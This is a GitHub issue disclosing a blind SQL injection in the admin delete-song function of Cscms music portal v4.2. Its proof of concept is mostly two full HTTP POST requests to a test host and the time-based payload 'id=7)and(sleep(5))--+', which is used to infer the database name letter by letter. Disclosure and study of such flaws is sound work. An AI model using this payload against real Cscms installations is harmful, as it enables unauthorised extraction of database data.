We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is a SQL blind injection vulnerability in dance_Dance.php_del
Add a song after administrator login POC
POST /admin.php/dance/admin/dance/save HTTP/1.1 Host: cscms.test Content-Length: 292 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cscms.test Referer: http://cscms.test/admin.php/dance/admin/dance/edit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_session=vh1bscpjrcvfiil1mcr4qhgo9ri1dck8; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA Connection: close cid=1&addtime=ok&name=1&color=&pic=&user=&cion=0&purl=&durl=&reco=0&tid=0&fid=0&zc=&zq=&bq=&hy=&singer=&dx=&yz=&sc=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&shits=0&xhits=0&vip=0&level=0&wpurl=&wppass=&skins=play.html&gc=0&text=&file=&lrc=&title=&keywords=&description=&id=0&sid=0
When deleting songs in the recycle bin, construct malicious statements and implement sql injection
POST /admin.php/dance/admin/dance/del?yid=3 HTTP/1.1 Host: cscms.test Content-Length: 21 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cscms.test Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=kpqu73c98lvqmbbkebu36pbd3pferpdb Connection: close id=7)and(sleep(5))--+
The payload executes and sleeps for 5 seconds
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code
Close "id" to achieve blind injection, so the vulnerability exists
The text was updated successfully, but these errors were encountered:
No branches or pull requests
SQL injection vulnerability exists in Cscms music portal system v4.2
There is a SQL blind injection vulnerability in dance_Dance.php_del
Details
Add a song after administrator login
![image](https://user-images.githubusercontent.com/96719328/158499410-c2be7972-449a-4534-b767-c01d6b108373.png)
POC
When deleting songs in the recycle bin, construct malicious statements and implement sql injection
The payload executes and sleeps for 5 seconds
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code
Close "id" to achieve blind injection, so the vulnerability exists
The text was updated successfully, but these errors were encountered: